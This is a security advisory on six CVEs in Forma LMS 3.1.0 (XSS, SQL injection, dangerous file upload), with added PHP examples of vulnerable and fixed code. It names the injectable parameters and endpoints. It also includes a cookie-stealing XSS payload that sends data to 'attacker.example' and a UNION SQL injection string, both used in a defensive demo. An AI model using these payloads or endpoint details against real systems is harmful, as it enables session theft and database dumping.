Multiple vulnerabilities in Forma LMS

Posted date 25/10/2022
Importance
5 - Critical
Affected Resources

Forma LMS, version 3.1.0.

Description

INCIBE has coordinated the publication of six vulnerabilities in Forma LMS, discovered by Tin Pham, aka 'TF1T'.

These vulnerabilities have been assigned the following codes:

  • CVE-2022-41679. A CVSS v3.1 base score of 4.7 has been calculated; the CVSS vector string is AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:N/A:N. The vulnerability type is CWE-79: improper neutralization of input during web page generation (cross-site scripting).
  • CVE-2022-41680. A CVSS v3.1 base score of 7.6 has been calculated; the CVSS vector string is AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:L. The vulnerability type is CWE-89: improper neutralization of special elements used in an SQL command (SQL injection).
  • CVE-2022-41681. A CVSS v3.1 base score of 9.9 has been calculated; the CVSS vector string is AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H. The vulnerability type is CWE-434: unrestricted upload of file with dangerous type.
  • CVE-2022-42923. A CVSS v3.1 base score of 8.3 has been calculated; the CVSS vector string is AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L. The vulnerability type is CWE-89: improper neutralization of special elements used in an SQL command (SQL injection).
  • CVE-2022-42924. A CVSS v3.1 base score of 7.6 has been calculated; the CVSS vector string is AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:L. The vulnerability type is CWE-89: improper neutralization of special elements used in an SQL command (SQL injection).
  • CVE-2022-42925. A CVSS v3.1 base score of 9.9 has been calculated; the CVSS vector string is AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H. The vulnerability type is CWE-434: unrestricted upload of file with dangerous type.
Solution

These vulnerabilities have been fixed by Forma in Forma LMS version 3.2.1.

Detail
  • CVE-2022-41679: Forma LMS version 3.1.0 and earlier is affected by a cross-site scripting vulnerability that could allow a remote attacker to inject JavaScript code through the 'back_url' parameter of 'appLms/index.php?modname=faq&op=play'. Exploiting it could allow an attacker to steal a user's cookies and log in to the application as that user.
  • CVE-2022-41680: Forma LMS version 3.1.0 and earlier is vulnerable to SQL injection. An authenticated attacker (with the student role) could inject SQL through the 'search[value]' parameter of 'appLms/ajax.server.php?r=mycertificate/getMyCertificates' and dump the entire database.
  • CVE-2022-41681: Forma LMS version 3.1.0 and earlier contains a vulnerability that could allow an authenticated attacker (with the student role) to escalate privileges and upload a ZIP file through the SCORM importer. Exploiting it could lead to remote code execution.
  • CVE-2022-42923: Forma LMS version 3.1.0 and earlier is vulnerable to SQL injection. An authenticated attacker (with the student role) could inject SQL through the 'id' parameter of 'appCore/index.php?r=adm/mediagallery/delete' and dump the entire database or delete every row of the 'core_user_file' table.
  • CVE-2022-42924: Forma LMS version 3.1.0 and earlier is vulnerable to SQL injection. An authenticated attacker (with the student role) could inject SQL through the 'dyn_filter' parameter of 'appLms/ajax.adm_server.php?r=widget/userselector/getusertabledata' and dump the entire database.
  • CVE-2022-42925: Forma LMS version 3.1.0 and earlier contains a vulnerability that could allow an authenticated attacker (with the student role) to escalate privileges and upload a ZIP file through the plugin upload component. Exploiting it could lead to remote code execution.
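The reflected XSS in CVE-2022-41679 is the classic case of a redirect-style parameter written straight into a page. The PHP below is an added illustration, not Forma LMS code: the link markup, the default URL and the attacker host 'attacker.example' are assumptions made for the demo, and it targets PHP 8.

```php
<?php
declare(strict_types=1);

// Added illustration, not Forma LMS code: handling a 'back_url'-style
// parameter before it is echoed into a page. Markup, default link and the
// attacker host are assumptions for the demo.

// Vulnerable pattern: the raw parameter is written into an href attribute,
// so a value containing "> closes the attribute and injects markup/script.
function renderBackLinkVulnerable(string $backUrl): string
{
    return '<a href="' . $backUrl . '">Back</a>';
}

// Step 1: accept only an application-relative path. No scheme (javascript:,
// data:), no protocol-relative //host, no backslashes, no whitespace or
// control characters; anything else falls back to a fixed default.
function safeBackUrl(?string $backUrl, string $default = 'index.php?modname=faq'): string
{
    if ($backUrl === null || $backUrl === '') {
        return $default;
    }
    if (preg_match('#^[a-z][a-z0-9+.\-]*:#i', $backUrl)        // explicit scheme
        || str_starts_with($backUrl, '//')                     // different host
        || !preg_match('#^[A-Za-z0-9][A-Za-z0-9/._~?&=%+\-]*$#', $backUrl)) {
        return $default;
    }
    return $backUrl;
}

// Step 2: HTML-encode at the point of output, with ENT_QUOTES so both quote
// characters are escaped inside the attribute.
function renderBackLinkSafe(?string $backUrl): string
{
    $url = htmlspecialchars(safeBackUrl($backUrl), ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return '<a href="' . $url . '">Back</a>';
}

// Constructed payload of the kind the advisory describes (cookie theft).
$payload = '"><script>new Image().src="https://attacker.example/?c="+document.cookie</script>';

echo renderBackLinkVulnerable($payload), PHP_EOL;                   // script tag lands in the page
echo renderBackLinkSafe($payload), PHP_EOL;                         // default link: payload rejected
echo renderBackLinkSafe('index.php?modname=faq&op=list'), PHP_EOL;  // legitimate value kept
```

Validation and output encoding are separate defences and both are needed: the allow-list regex stops the value from becoming a 'javascript:' link or an open redirect, and htmlspecialchars stops it from breaking out of the attribute. Since the advisory's impact is cookie theft, the session cookie should also carry the HttpOnly flag (PHP's session.cookie_httponly), which keeps document.cookie from exposing it even if a script does run.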
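The three SQL injections (CVE-2022-41680, CVE-2022-42923, CVE-2022-42924) share one root cause: request parameters concatenated into SQL text. The PHP below is an added example, not Forma LMS code: the table and column names (core_certificate, name, id_user) and the DataTables-style request shape are assumptions, and the in-memory SQLite database is constructed so the block runs offline. It shows the vulnerable pattern beside its hardened form for a 'search[value]' parameter and for a numeric 'id' in a delete handler.

```php
<?php
declare(strict_types=1);

// Added illustration, not Forma LMS code. Table/column names and the request
// shape are assumptions; the SQLite data below is constructed for the demo.

// Vulnerable pattern: the attacker-controlled search[value] string is pasted
// into the SQL text. A student closes the quote and appends UNION SELECT ...,
// which is how "dump the entire database" happens.
function getMyCertificatesVulnerable(PDO $db, array $request, int $userId): array
{
    $search = $request['search']['value'] ?? '';
    $sql = "SELECT id, name FROM core_certificate "
         . "WHERE id_user = $userId AND name LIKE '%$search%'";
    return $db->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// LIKE metacharacters are escaped so a search for "100%" matches literally
// instead of turning into a wildcard (a separate issue from injection).
function escapeLike(string $s): string
{
    return str_replace(['\\', '%', '_'], ['\\\\', '\\%', '\\_'], $s);
}

// Hardened pattern: the query text is fixed and user data travels as bound
// parameters, so the database never parses it as SQL.
function getMyCertificatesSafe(PDO $db, array $request, int $userId): array
{
    $search = (string)($request['search']['value'] ?? '');
    if (strlen($search) > 100) {                      // bound the input size
        throw new InvalidArgumentException('search term too long');
    }
    $stmt = $db->prepare(
        "SELECT id, name FROM core_certificate "
      . "WHERE id_user = :uid AND name LIKE :pattern ESCAPE '\\'"
    );
    $stmt->bindValue(':uid', $userId, PDO::PARAM_INT);
    $stmt->bindValue(':pattern', '%' . escapeLike($search) . '%', PDO::PARAM_STR);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Same rule for a numeric 'id' (the mediagallery/delete case): validate it as
// an integer, bind it, and scope the DELETE to the caller so a student cannot
// delete other users' rows even with a valid id.
function deleteMediaSafe(PDO $db, array $request, int $userId): int
{
    $id = filter_var($request['id'] ?? null, FILTER_VALIDATE_INT);
    if ($id === false) {
        throw new InvalidArgumentException('id must be an integer');
    }
    $stmt = $db->prepare("DELETE FROM core_user_file WHERE id = :id AND id_user = :uid");
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->bindValue(':uid', $userId, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->rowCount();
}

// Demo with constructed data in an in-memory SQLite database.
$db = new PDO('sqlite::memory:', null, null, [PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION]);
$db->exec("CREATE TABLE core_certificate (id INTEGER PRIMARY KEY, id_user INTEGER, name TEXT)");
$db->exec("INSERT INTO core_certificate (id_user, name) VALUES (1, 'Safety 101'), (2, 'Admin secrets')");

// Constructed payload: closes the LIKE literal and unions in every row.
$payload = ['search' => ['value' => "' UNION SELECT id_user, name FROM core_certificate -- "]];

var_dump(count(getMyCertificatesVulnerable($db, $payload, 1)));  // 2: the other user's row leaks
var_dump(getMyCertificatesSafe($db, $payload, 1));               // []: the payload is just text
```

Prepared statements fix the injection; the ownership clause in the DELETE (id_user = :uid) and the integer validation address the separate authorization failure the advisory describes, where a student can reach an admin route at all. The 'dyn_filter' case follows the same shape: whatever filter syntax the endpoint accepts must be parsed into a fixed query plus bound values, never concatenated.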

If you have any information regarding this advisory, please contact INCIBE as indicated in the CVE assignment and publication.
